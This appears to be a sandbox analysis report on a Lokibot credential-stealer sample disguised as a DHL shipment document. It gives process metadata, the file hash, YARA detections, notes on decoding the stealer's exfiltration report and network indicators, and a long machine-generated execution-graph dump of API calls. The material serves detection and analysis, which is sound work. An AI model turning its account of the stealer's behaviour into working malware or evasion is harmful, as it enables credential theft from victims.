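Run as-is it reports all four header indicators and a record with binary ID "ckav.ru", the complete strings "jones" and "066656", a partial "DESKTOP-716T" cut off by the report's 82-byte limit, and 81 bytes missing. For network detection the User-Agent together with the Content-Key header is the low-false-positive pair; the HTTP/1.0 POST to a bare IP is supporting context. Fed the full 163-byte body the same loop would return the hostname field whole and continue to whatever follows it.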



                  Target ID:0
                  Start time:07:12:04
                  Start date:21/03/2023
                  Path:C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe
                  Imagebase:0xe60000
                  File size:852480 bytes
                  MD5 hash:370EBDF4FF5036C106793994CC851779
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:low

                  Target ID:3
                  Start time:07:13:18
                  Start date:21/03/2023
                  Path:C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe
                  Imagebase:0x7ff61e220000
                  File size:852480 bytes
                  MD5 hash:370EBDF4FF5036C106793994CC851779
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifacts observed in infostealers, Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low


                    Execution Graph

                    Execution Coverage:31.6%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:4.4%
                    Total number of Nodes:1846
                    Total number of Limit Nodes:93
                    execution_graph: node and edge listing omitted (interactive graph rendered as a flat list of node addresses). API-call annotations recoverable from the listing: 402bab (GetProcessHeap, HeapFree); 405872 (GetProcessHeap, RtlAllocateHeap, GetProcessHeap, HeapFree); 4059d8 (GetProcessHeap, RtlAllocateHeap, GetProcAddress, GetPEB); 406441 (GetNativeSystemInfo); 404585 (GetLastError).
8864->8865 8866 4047d9 8865->8866 8866->8687 8868 406fde 8867->8868 8869 407027 8868->8869 8870 4031e5 4 API calls 8868->8870 8869->8819 8871 406ffa 8870->8871 8872 4031e5 4 API calls 8871->8872 8873 407011 8872->8873 8874 4031e5 4 API calls 8873->8874 8874->8869 8876 4031e5 4 API calls 8875->8876 8877 4060bb 8876->8877 8877->8877 8879 4031e5 4 API calls 8878->8879 8880 40591a 8879->8880 8880->8717 8882 4031e5 4 API calls 8881->8882 8883 405971 8882->8883 8883->8722 8885 4031e5 4 API calls 8884->8885 8886 4059ed 8885->8886 8887 402b7c 2 API calls 8886->8887 8890 405a38 8886->8890 8888 405a16 8887->8888 8889 4031e5 4 API calls 8888->8889 8888->8890 8889->8890 8890->8634 8892 4031e5 4 API calls 8891->8892 8893 4044b9 8892->8893 8893->8492 9813 40a349 9814 4098a7 13 API calls 9813->9814 9815 40a359 9814->9815 9052 408952 9073 40823f 9052->9073 9055 408960 9057 4056bf 2 API calls 9055->9057 9058 40896a 9057->9058 9101 408862 9058->9101 9060 413aca 4 API calls 9061 4089d4 9060->9061 9063 405695 2 API calls 9061->9063 9062 408975 9070 4089c4 9062->9070 9109 4087d6 9062->9109 9065 4089df 9063->9065 9070->9060 9071 402bab 2 API calls 9072 40899d 9071->9072 9072->9070 9072->9071 9074 40824d 9073->9074 9075 40831b 9074->9075 9076 4031e5 4 API calls 9074->9076 9075->9055 9089 4083bb 9075->9089 9077 40826d 9076->9077 9078 4031e5 4 API calls 9077->9078 9079 408289 9078->9079 9080 4031e5 4 API calls 9079->9080 9081 4082a5 9080->9081 9082 4031e5 4 API calls 9081->9082 9083 4082c1 9082->9083 9084 4031e5 4 API calls 9083->9084 9085 4082e2 9084->9085 9086 4031e5 4 API calls 9085->9086 9087 4082ff 9086->9087 9088 4031e5 4 API calls 9087->9088 9088->9075 9137 408363 9089->9137 9092 4056bf 2 API calls 9098 4083f4 9092->9098 9093 413aca 4 API calls 9094 4084a0 9093->9094 9095 405695 2 API calls 9094->9095 9096 4084ab 9095->9096 9096->9055 9097 408492 9097->9093 9098->9097 9140 40815d 9098->9140 9155 40805d 9098->9155 9170 404b8f 9101->9170 9103 408946 9103->9062 9104 40887e 9104->9103 
9105 4031e5 4 API calls 9104->9105 9106 40893e 9104->9106 9108 402b7c 2 API calls 9104->9108 9105->9104 9173 404a39 9106->9173 9108->9104 9110 402b7c 2 API calls 9109->9110 9111 4087e7 9110->9111 9112 4031e5 4 API calls 9111->9112 9117 40885a 9111->9117 9115 408802 9112->9115 9113 408853 9114 402bab 2 API calls 9113->9114 9114->9117 9115->9113 9118 40884d 9115->9118 9182 408522 9115->9182 9186 4084b4 9115->9186 9121 408749 9117->9121 9189 4084d4 9118->9189 9122 404b8f 5 API calls 9121->9122 9127 408765 9122->9127 9123 4087cf 9129 4085d1 9123->9129 9124 4031e5 4 API calls 9124->9127 9125 408522 4 API calls 9125->9127 9126 4087c7 9128 404a39 5 API calls 9126->9128 9127->9123 9127->9124 9127->9125 9127->9126 9128->9123 9130 4086c2 9129->9130 9131 4085e9 9129->9131 9130->9072 9131->9130 9133 402bab 2 API calls 9131->9133 9134 4031e5 4 API calls 9131->9134 9195 4089e6 9131->9195 9214 4086c9 9131->9214 9218 4036a3 9131->9218 9133->9131 9134->9131 9138 4031e5 4 API calls 9137->9138 9139 408386 9138->9139 9139->9092 9139->9096 9141 40816f 9140->9141 9142 4081b6 9141->9142 9143 4081fd 9141->9143 9154 4081ef 9141->9154 9145 405872 4 API calls 9142->9145 9144 405872 4 API calls 9143->9144 9146 408213 9144->9146 9147 4081cf 9145->9147 9148 405872 4 API calls 9146->9148 9149 405872 4 API calls 9147->9149 9151 408222 9148->9151 9150 4081df 9149->9150 9152 405872 4 API calls 9150->9152 9153 405872 4 API calls 9151->9153 9152->9154 9153->9154 9154->9098 9156 40808c 9155->9156 9157 4080d2 9156->9157 9158 408119 9156->9158 9169 40810b 9156->9169 9160 405872 4 API calls 9157->9160 9159 405872 4 API calls 9158->9159 9161 40812f 9159->9161 9162 4080eb 9160->9162 9164 405872 4 API calls 9161->9164 9163 405872 4 API calls 9162->9163 9165 4080fb 9163->9165 9166 40813e 9164->9166 9167 405872 4 API calls 9165->9167 9168 405872 4 API calls 9166->9168 9167->9169 9168->9169 9169->9098 9176 404a19 9170->9176 9172 404ba0 9172->9104 9179 4049ff 9173->9179 9175 404a44 9175->9103 9177 4031e5 4 API 
calls 9176->9177 9178 404a2c RegOpenKeyW 9177->9178 9178->9172 9180 4031e5 4 API calls 9179->9180 9181 404a12 RegCloseKey 9180->9181 9181->9175 9184 408534 9182->9184 9183 4085af 9183->9115 9184->9183 9192 4084ee 9184->9192 9187 4031e5 4 API calls 9186->9187 9188 4084c7 9187->9188 9188->9115 9190 4031e5 4 API calls 9189->9190 9191 4084e7 9190->9191 9191->9113 9193 4031e5 4 API calls 9192->9193 9194 408501 9193->9194 9194->9183 9196 4031e5 4 API calls 9195->9196 9197 408a06 9196->9197 9198 408b21 9197->9198 9199 4031e5 4 API calls 9197->9199 9198->9131 9202 408a32 9199->9202 9200 408b17 9230 403649 9200->9230 9202->9200 9221 403666 9202->9221 9205 4031e5 4 API calls 9207 408a88 9205->9207 9208 4031e5 4 API calls 9207->9208 9213 408b0e 9207->9213 9209 408ac4 9208->9209 9210 405b6f 6 API calls 9209->9210 9211 408aff 9210->9211 9211->9213 9224 408508 9211->9224 9227 40362f 9213->9227 9215 408744 9214->9215 9216 4086e2 9214->9216 9215->9131 9216->9215 9217 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9216->9217 9217->9216 9219 4031e5 4 API calls 9218->9219 9220 4036b5 9219->9220 9220->9131 9222 4031e5 4 API calls 9221->9222 9223 403679 9222->9223 9223->9205 9223->9213 9225 4031e5 4 API calls 9224->9225 9226 40851b 9225->9226 9226->9213 9228 4031e5 4 API calls 9227->9228 9229 403642 9228->9229 9229->9200 9231 4031e5 4 API calls 9230->9231 9232 40365c 9231->9232 9232->9198 9833 40f252 9834 404bee 6 API calls 9833->9834 9835 40f269 9834->9835 9836 404bee 6 API calls 9835->9836 9847 40f2ff 9835->9847 9837 40f282 9836->9837 9838 404bee 6 API calls 9837->9838 9839 40f290 9838->9839 9850 404c4e 9839->9850 9841 40f2a7 9842 405872 4 API calls 9841->9842 9841->9847 9843 40f2cd 9842->9843 9844 405872 4 API calls 9843->9844 9845 40f2dc 9844->9845 9846 405872 4 API calls 9845->9846 9848 40f2ee 9846->9848 9849 405762 4 API calls 9848->9849 9849->9847 9851 402b7c 2 API calls 9850->9851 9853 404c60 9851->9853 9852 404ca4 9852->9841 9853->9852 9854 4031e5 4 API calls 
9853->9854 9855 404c8d 9854->9855 9855->9852 9856 402bab 2 API calls 9855->9856 9856->9852 9857 41045c 9858 4040bb 12 API calls 9857->9858 9859 410477 9858->9859 9860 41060b 9859->9860 9888 407851 9859->9888 9862 41048f 9864 407851 2 API calls 9862->9864 9868 410604 9862->9868 9863 403f9e 5 API calls 9863->9860 9865 4104a9 9864->9865 9870 4105e0 9865->9870 9871 405ae9 6 API calls 9865->9871 9873 41056f 9865->9873 9874 4105eb 9865->9874 9866 402bab 2 API calls 9866->9868 9867 402bab 2 API calls 9869 4105fb 9867->9869 9868->9863 9869->9866 9872 402bab 2 API calls 9870->9872 9870->9874 9871->9865 9872->9874 9873->9870 9875 4105d6 9873->9875 9877 412269 6 API calls 9873->9877 9874->9867 9874->9869 9876 402bab 2 API calls 9875->9876 9876->9870 9878 410580 9877->9878 9878->9875 9879 405872 4 API calls 9878->9879 9880 410599 9879->9880 9881 405872 4 API calls 9880->9881 9882 4105a9 9881->9882 9883 405872 4 API calls 9882->9883 9884 4105bb 9883->9884 9885 405872 4 API calls 9884->9885 9886 4105cd 9885->9886 9887 402bab 2 API calls 9886->9887 9887->9875 9889 407866 9888->9889 9890 402b7c 2 API calls 9889->9890 9891 407899 9889->9891 9890->9891 9891->9862 9294 40f561 9297 40f4b6 9294->9297 9298 413b28 6 API calls 9297->9298 9299 40f4bf 9298->9299 9300 405b6f 6 API calls 9299->9300 9301 402bab GetProcessHeap HeapFree 9299->9301 9302 413a58 13 API calls 9299->9302 9303 40f559 9299->9303 9300->9299 9301->9299 9302->9299 9307 403b64 9308 4031e5 4 API calls 9307->9308 9309 403b77 PathFileExistsW 9308->9309 9923 40d069 9924 404bee 6 API calls 9923->9924 9925 40d080 9924->9925 9926 404bee 6 API calls 9925->9926 9948 40d1e2 9925->9948 9927 40d099 9926->9927 9928 404bee 6 API calls 9927->9928 9929 40d0a7 9928->9929 9964 404ba7 9929->9964 9932 404bee 6 API calls 9933 40d0c5 9932->9933 9934 404c4e 6 API calls 9933->9934 9935 40d0dc 9934->9935 9936 404bee 6 API calls 9935->9936 9937 40d0eb 9936->9937 9938 404ba7 4 API calls 9937->9938 9939 40d0fa 9938->9939 9940 404bee 6 API calls 
9939->9940 9941 40d109 9940->9941 9942 404c4e 6 API calls 9941->9942 9943 40d123 9942->9943 9944 405872 4 API calls 9943->9944 9943->9948 9945 40d14a 9944->9945 9946 405872 4 API calls 9945->9946 9947 40d159 9946->9947 9949 405872 4 API calls 9947->9949 9950 40d16b 9949->9950 9951 405781 4 API calls 9950->9951 9952 40d179 9951->9952 9953 405872 4 API calls 9952->9953 9954 40d18b 9953->9954 9955 405762 4 API calls 9954->9955 9956 40d19f 9955->9956 9957 405872 4 API calls 9956->9957 9958 40d1b1 9957->9958 9959 405781 4 API calls 9958->9959 9960 40d1bf 9959->9960 9961 405872 4 API calls 9960->9961 9962 40d1d1 9961->9962 9963 405762 4 API calls 9962->9963 9963->9948 9965 4031e5 4 API calls 9964->9965 9966 404bca 9965->9966 9966->9932 9336 40f16e 9337 4056bf 2 API calls 9336->9337 9338 40f17b 9337->9338 9339 412093 20 API calls 9338->9339 9340 40f19e 9339->9340 9341 412093 20 API calls 9340->9341 9342 40f1b6 9341->9342 9343 412093 20 API calls 9342->9343 9344 40f1cc 9343->9344 9345 412093 20 API calls 9344->9345 9346 40f1e2 9345->9346 9347 413aca 4 API calls 9346->9347 9348 40f1ef 9347->9348 9349 405695 2 API calls 9348->9349 9350 40f1fa 9349->9350 9351 40ce71 9352 413b28 6 API calls 9351->9352 9353 40ce78 9352->9353 9354 405b6f 6 API calls 9353->9354 9355 40ce83 9354->9355 9359 40ceba 9355->9359 9362 403d74 19 API calls 9355->9362 9363 40cec1 9355->9363 9356 403fbf 7 API calls 9357 40cecc 9356->9357 9358 40cefb 9357->9358 9361 403d74 19 API calls 9357->9361 9360 402bab 2 API calls 9359->9360 9360->9363 9364 40cee7 9361->9364 9365 40cead 9362->9365 9363->9356 9366 40cef4 9364->9366 9369 402bab 2 API calls 9364->9369 9365->9359 9368 402bab 2 API calls 9365->9368 9367 402bab 2 API calls 9366->9367 9367->9358 9368->9359 9369->9366 9370 406472 9371 4031e5 4 API calls 9370->9371 9372 406484 Sleep 9371->9372 10040 40f204 10041 405781 4 API calls 10040->10041 10042 40f214 10041->10042 10043 4057df 13 API calls 10042->10043 10044 40f226 10043->10044 9430 403c08 9431 4031e5 4 
API calls 9430->9431 9432 403c1a DeleteFileW 9431->9432 9433 410a09 9434 41219c 14 API calls 9433->9434 9435 410a1b 9434->9435 9436 41219c 14 API calls 9435->9436 9437 410a23 9436->9437 9438 41219c 14 API calls 9437->9438 9439 410a2c 9438->9439 9440 41219c 14 API calls 9439->9440 9441 410a38 9440->9441 9442 404b22 6 API calls 9441->9442 9443 410a4c 9442->9443 9444 403fbf 7 API calls 9443->9444 9450 410a7a 9443->9450 9445 410a5c 9444->9445 9446 410a71 9445->9446 9447 413a58 13 API calls 9445->9447 9448 402bab 2 API calls 9446->9448 9449 410a6b 9447->9449 9448->9450 9451 402bab 2 API calls 9449->9451 9451->9446 10045 410d09 10046 410d56 10045->10046 10047 410d17 10045->10047 10049 413a58 13 API calls 10046->10049 10061 406642 10047->10061 10051 410d6f 10049->10051 10052 4056bf 2 API calls 10053 410d2e 10052->10053 10074 405641 10053->10074 10055 410d41 10056 413aca 4 API calls 10055->10056 10057 410d4a 10056->10057 10058 405695 2 API calls 10057->10058 10059 410d50 10058->10059 10060 4036a3 4 API calls 10059->10060 10060->10046 10062 406662 10061->10062 10063 4031e5 4 API calls 10062->10063 10064 406676 10063->10064 10078 4066bf 10064->10078 10069 4066b1 10072 4036a3 4 API calls 10069->10072 10070 4066a7 10071 4036a3 4 API calls 10070->10071 10073 4066ac 10071->10073 10072->10073 10073->10046 10073->10052 10075 40564d 10074->10075 10076 405673 10074->10076 10075->10076 10077 4056fc 4 API calls 10075->10077 10076->10055 10077->10076 10079 4031e5 4 API calls 10078->10079 10080 4066dc 10079->10080 10081 4066f6 SetLastError 10080->10081 10082 406708 GetLastError 10080->10082 10099 406693 10081->10099 10083 406713 10082->10083 10082->10099 10084 4031e5 4 API calls 10083->10084 10085 406725 10084->10085 10086 4031e5 4 API calls 10085->10086 10085->10099 10087 40673f 10086->10087 10088 406753 10087->10088 10089 406749 10087->10089 10091 4031e5 4 API calls 10088->10091 10090 4036a3 4 API calls 10089->10090 10090->10099 10092 406761 10091->10092 10093 40678a 10092->10093 
10094 40677c 10092->10094 10096 4036a3 4 API calls 10093->10096 10095 4036a3 4 API calls 10094->10095 10097 406781 10095->10097 10096->10099 10098 4036a3 4 API calls 10097->10098 10098->10099 10100 406455 10099->10100 10101 4031e5 4 API calls 10100->10101 10102 406468 10101->10102 10102->10069 10102->10070 9452 40c509 9453 412093 20 API calls 9452->9453 9454 40c51e 9453->9454 9461 40910d 9462 404b22 6 API calls 9461->9462 9463 409124 9462->9463 9464 40917a 9463->9464 9465 405b6f 6 API calls 9463->9465 9466 40913e 9465->9466 9468 404b22 6 API calls 9466->9468 9472 409173 9466->9472 9467 402bab 2 API calls 9467->9464 9469 409153 9468->9469 9471 409408 15 API calls 9469->9471 9475 40916a 9469->9475 9470 402bab 2 API calls 9470->9472 9473 409164 9471->9473 9472->9467 9474 402bab 2 API calls 9473->9474 9474->9475 9475->9470 9479 410410 9480 4056bf 2 API calls 9479->9480 9481 41041b 9480->9481 9482 412093 20 API calls 9481->9482 9483 41043c 9482->9483 9484 413aca 4 API calls 9483->9484 9485 410449 9484->9485 9486 405695 2 API calls 9485->9486 9487 410454 9486->9487 9514 40c71a 9515 41219c 14 API calls 9514->9515 9516 40c728 9515->9516 10158 410b1a 10159 404bee 6 API calls 10158->10159 10161 410b31 10159->10161 10160 410c6d 10161->10160 10162 404bee 6 API calls 10161->10162 10163 410b5a 10162->10163 10164 404bee 6 API calls 10163->10164 10165 410b69 10164->10165 10166 404bee 6 API calls 10165->10166 10167 410b78 10166->10167 10168 404ba7 4 API calls 10167->10168 10169 410b86 10168->10169 10170 404ba7 4 API calls 10169->10170 10171 410b95 10170->10171 10171->10160 10172 405872 4 API calls 10171->10172 10173 410bd7 10172->10173 10174 405872 4 API calls 10173->10174 10175 410be8 10174->10175 10176 405872 4 API calls 10175->10176 10177 410bf9 10176->10177 10178 405781 4 API calls 10177->10178 10179 410c07 10178->10179 10180 405781 4 API calls 10179->10180 10184 410c15 10180->10184 10181 410c4e 10182 405762 4 API calls 10181->10182 10183 410c60 10182->10183 10183->10160 10185 
403f9e 5 API calls 10183->10185 10184->10181 10191 405e5a 10184->10191 10185->10160 10188 4040bb 12 API calls 10189 410c44 10188->10189 10190 402bab 2 API calls 10189->10190 10190->10181 10192 402b7c 2 API calls 10191->10192 10193 405e72 10192->10193 10194 4031e5 4 API calls 10193->10194 10197 405ea3 10193->10197 10195 405e94 10194->10195 10196 402bab 2 API calls 10195->10196 10195->10197 10196->10197 10197->10181 10197->10188 10198 40f81c 10199 404bee 6 API calls 10198->10199 10200 40f833 10199->10200 10201 404bee 6 API calls 10200->10201 10215 40f94f 10200->10215 10202 40f85c 10201->10202 10203 404bee 6 API calls 10202->10203 10204 40f86b 10203->10204 10205 404bee 6 API calls 10204->10205 10206 40f87a 10205->10206 10207 404bee 6 API calls 10206->10207 10208 40f888 10207->10208 10209 404ba7 4 API calls 10208->10209 10210 40f897 10209->10210 10211 405872 4 API calls 10210->10211 10210->10215 10212 40f8d8 10211->10212 10213 405872 4 API calls 10212->10213 10214 40f8ea 10213->10214 10216 405872 4 API calls 10214->10216 10217 40f8fa 10216->10217 10218 405872 4 API calls 10217->10218 10219 40f90c 10218->10219 10220 405781 4 API calls 10219->10220 10221 40f91d 10220->10221 10222 4040bb 12 API calls 10221->10222 10223 40f92d 10222->10223 10224 405762 4 API calls 10223->10224 10225 40f93f 10224->10225 10225->10215 10226 403f9e 5 API calls 10225->10226 10226->10215 9529 402c1f 9530 4031e5 4 API calls 9529->9530 9531 402c31 LoadLibraryW 9530->9531 10236 407e1f 10237 407e2c 10236->10237 10240 407e61 10236->10240 10241 407e3e 10237->10241 10243 402bab 2 API calls 10237->10243 10245 407e51 10237->10245 10238 407eb6 10238->10245 10246 402bab 2 API calls 10238->10246 10239 407ed4 10240->10238 10247 405872 4 API calls 10240->10247 10253 407ea6 10240->10253 10241->10239 10244 402bab 2 API calls 10241->10244 10242 402bab 2 API calls 10242->10238 10243->10241 10244->10245 10245->10239 10248 402bab 2 API calls 10245->10248 10246->10245 10249 407e86 10247->10249 10248->10239 10250 
405872 4 API calls 10249->10250 10251 407e96 10250->10251 10252 405872 4 API calls 10251->10252 10252->10253 10253->10238 10253->10242 9544 405924 9545 4031e5 4 API calls 9544->9545 9546 405937 StrStrW 9545->9546 10262 410927 10263 4044ee 7 API calls 10262->10263 10264 41093d 10263->10264 10265 4109a4 10264->10265 10266 4056bf 2 API calls 10264->10266 10269 410954 10266->10269 10267 4044ee 7 API calls 10267->10269 10269->10267 10270 410990 10269->10270 10271 402bab 2 API calls 10269->10271 10277 41080e 10269->10277 10272 413aca 4 API calls 10270->10272 10271->10269 10273 410998 10272->10273 10274 405695 2 API calls 10273->10274 10275 41099e 10274->10275 10276 402bab 2 API calls 10275->10276 10276->10265 10278 410821 10277->10278 10288 41091f 10278->10288 10289 410701 10278->10289 10281 405872 4 API calls 10282 410900 10281->10282 10283 405872 4 API calls 10282->10283 10284 41090d 10283->10284 10285 405872 4 API calls 10284->10285 10286 410919 10285->10286 10287 402bab 2 API calls 10286->10287 10287->10288 10288->10269 10290 405f08 4 API calls 10289->10290 10292 410713 10290->10292 10291 410804 10291->10281 10291->10288 10292->10291 10293 402b7c 2 API calls 10292->10293 10294 410748 10293->10294 10296 402b7c 2 API calls 10294->10296 10298 4107fd 10294->10298 10295 402bab 2 API calls 10295->10291 10299 4107ad 10296->10299 10297 402bab 2 API calls 10297->10298 10298->10295 10299->10297 10300 40d726 10301 404bee 6 API calls 10300->10301 10302 40d73f 10301->10302 10303 40db63 10302->10303 10304 405872 4 API calls 10302->10304 10307 40d761 10304->10307 10305 404bee 6 API calls 10305->10307 10306 405872 4 API calls 10306->10307 10307->10305 10307->10306 10309 40d971 10307->10309 10308 404ba7 4 API calls 10308->10309 10309->10308 10310 405781 4 API calls 10309->10310 10314 40d9bb 10309->10314 10310->10309 10311 404c4e 6 API calls 10311->10314 10312 405781 4 API calls 10312->10314 10313 4037be 4 API calls 10313->10314 10314->10303 10314->10311 10314->10312 10314->10313 
10315 405872 4 API calls 10314->10315 10315->10314 9602 40f12f 9603 41219c 14 API calls 9602->9603 9604 40f13f 9603->9604 9605 41219c 14 API calls 9604->9605 9606 40f14c 9605->9606 9607 41219c 14 API calls 9606->9607 9608 40f159 9607->9608 9609 41219c 14 API calls 9608->9609 9610 40f166 9609->9610 9617 40ed35 9618 4056bf 2 API calls 9617->9618 9619 40ed42 9618->9619 9620 412093 20 API calls 9619->9620 9621 40ed63 9620->9621 9622 412093 20 API calls 9621->9622 9623 40ed73 9622->9623 9624 413aca 4 API calls 9623->9624 9625 40ed80 9624->9625 9626 405695 2 API calls 9625->9626 9627 40ed8e 9626->9627 8071 40f3c5 8076 41219c 8071->8076 8074 41219c 14 API calls 8075 40f3e1 8074->8075 8077 4121b1 8076->8077 8093 40f3d3 8076->8093 8078 4121be 8077->8078 8082 4121c5 8077->8082 8124 413ba4 8078->8124 8080 4121ca 8094 404056 8080->8094 8082->8080 8087 412210 8082->8087 8083 4121c3 8083->8093 8101 405b6f 8083->8101 8086 41224d 8091 402bab 2 API calls 8086->8091 8086->8093 8087->8093 8129 403fbf 8087->8129 8091->8093 8093->8074 8140 402b7c GetProcessHeap RtlAllocateHeap 8094->8140 8096 404066 8098 404095 8096->8098 8142 4031e5 8096->8142 8098->8083 8100 402bab 2 API calls 8100->8098 8102 405b7d 8101->8102 8103 402b7c 2 API calls 8102->8103 8104 405b99 8103->8104 8113 405c02 8104->8113 8178 4059b8 8104->8178 8106 405c09 8108 402bab 2 API calls 8106->8108 8107 405bba 8107->8106 8109 402b7c 2 API calls 8107->8109 8108->8113 8110 405bdd 8109->8110 8110->8106 8111 405be4 8110->8111 8112 402bab 2 API calls 8111->8112 8112->8113 8113->8086 8114 413a58 8113->8114 8115 413a63 8114->8115 8123 412245 8114->8123 8115->8123 8181 405781 8115->8181 8118 405781 4 API calls 8119 413aa0 8118->8119 8184 4057df 8119->8184 8122 405781 4 API calls 8122->8123 8137 402bab 8123->8137 8125 413bad 8124->8125 8126 404056 6 API calls 8125->8126 8128 413bb8 8125->8128 8127 413bc5 8126->8127 8127->8083 8128->8083 8130 402b7c 2 API calls 8129->8130 8131 403fcf 8130->8131 8136 403ff4 8131->8136 8303 403b98 
8131->8303 8134 403ff8 GetLastError 8135 402bab 2 API calls 8134->8135 8135->8136 8136->8083 8138 402bb4 GetProcessHeap HeapFree 8137->8138 8139 402bc6 8137->8139 8138->8139 8139->8086 8141 402b98 8140->8141 8141->8096 8143 4031f3 8142->8143 8144 403236 8142->8144 8143->8144 8147 403208 8143->8147 8153 4030a5 8144->8153 8146 403224 8149 403258 8146->8149 8151 4031e5 4 API calls 8146->8151 8159 403263 8147->8159 8149->8098 8149->8100 8150 40320d 8150->8149 8152 4030a5 4 API calls 8150->8152 8151->8149 8152->8146 8165 402ca4 8153->8165 8155 4030b0 8156 4030b5 8155->8156 8169 4030c4 8155->8169 8156->8146 8160 40326d 8159->8160 8161 402b7c 2 API calls 8160->8161 8164 4032b7 8160->8164 8162 40328c 8161->8162 8163 402b7c 2 API calls 8162->8163 8163->8164 8164->8150 8166 403079 8165->8166 8167 40307c 8166->8167 8173 40317b GetPEB 8166->8173 8167->8155 8171 4030eb 8169->8171 8170 4030c0 8170->8146 8171->8170 8175 402c03 8171->8175 8174 40319b 8173->8174 8174->8167 8176 4031e5 3 API calls 8175->8176 8177 402c15 GetProcAddress 8176->8177 8177->8170 8179 4031e5 4 API calls 8178->8179 8180 4059cb 8179->8180 8180->8107 8199 405797 8181->8199 8183 405792 8183->8118 8185 405832 8184->8185 8186 4057eb 8184->8186 8185->8122 8185->8123 8186->8185 8209 4040bb 8186->8209 8189 405839 8191 405853 8189->8191 8236 405627 8189->8236 8190 40582c 8233 403f9e 8190->8233 8247 405762 8191->8247 8197 403f9e 5 API calls 8197->8185 8200 4057a1 8199->8200 8201 4057bd 8199->8201 8200->8201 8203 4056fc 8200->8203 8201->8183 8204 405714 8203->8204 8205 402b7c 2 API calls 8204->8205 8206 405730 8205->8206 8207 402bab 2 API calls 8206->8207 8208 405752 8206->8208 8207->8208 8208->8201 8210 4031e5 4 API calls 8209->8210 8211 4040d5 CreateFileW 8210->8211 8212 4040f8 8211->8212 8213 40418d 8211->8213 8214 4031e5 4 API calls 8212->8214 8215 404183 8213->8215 8253 403c90 8213->8253 8221 404105 8214->8221 8215->8185 8215->8189 8215->8190 8218 40416d 8250 403c40 8218->8250 8221->8218 8225 4031e5 4 API calls 
8221->8225 8223 4040bb 9 API calls 8226 4041c8 8223->8226 8224 402bab 2 API calls 8224->8215 8227 404131 VirtualAlloc 8225->8227 8226->8224 8227->8218 8228 404142 8227->8228 8229 4031e5 4 API calls 8228->8229 8230 40414f ReadFile 8229->8230 8230->8218 8231 404160 8230->8231 8232 4031e5 4 API calls 8231->8232 8232->8218 8234 4031e5 4 API calls 8233->8234 8235 403fb1 VirtualFree 8234->8235 8235->8185 8237 4031e5 4 API calls 8236->8237 8238 40563a 8237->8238 8239 405872 8238->8239 8241 405881 8239->8241 8240 4058bc 8243 405797 4 API calls 8240->8243 8244 4058af 8240->8244 8241->8240 8300 4058d4 8241->8300 8243->8244 8244->8191 8246 405781 4 API calls 8246->8240 8248 405781 4 API calls 8247->8248 8249 405770 8248->8249 8249->8197 8251 4031e5 4 API calls 8250->8251 8252 403c52 FindCloseChangeNotification 8251->8252 8252->8215 8254 403ca3 8253->8254 8257 403caa 8253->8257 8280 405dc5 8254->8280 8256 404056 6 API calls 8258 403cbe 8256->8258 8257->8256 8259 403d3a 8257->8259 8260 403d2e 8258->8260 8261 403d17 8258->8261 8262 403ccf 8258->8262 8259->8215 8276 403c59 8259->8276 8260->8259 8263 402bab 2 API calls 8260->8263 8264 405b6f 6 API calls 8261->8264 8265 405b6f 6 API calls 8262->8265 8263->8259 8267 403d14 8264->8267 8266 403cdd 8265->8266 8268 405b6f 6 API calls 8266->8268 8269 402bab 2 API calls 8267->8269 8270 403cee 8268->8270 8269->8260 8270->8267 8285 403d4d 8270->8285 8273 403d0b 8275 402bab 2 API calls 8273->8275 8275->8267 8277 403c21 8276->8277 8278 4031e5 4 API calls 8277->8278 8279 403c33 8278->8279 8279->8223 8279->8226 8294 406799 8280->8294 8282 405dd5 8283 402b7c 2 API calls 8282->8283 8284 405dfe 8283->8284 8284->8257 8297 403bb7 8285->8297 8287 403cfe 8287->8273 8288 403c62 8287->8288 8289 403d4d 5 API calls 8288->8289 8290 403c6d 8289->8290 8291 403c72 8290->8291 8292 4031e5 4 API calls 8290->8292 8291->8273 8293 403c87 CreateDirectoryW 8292->8293 8293->8273 8295 4031e5 4 API calls 8294->8295 8296 4067ad 8295->8296 8296->8282 8298 4031e5 4 API 
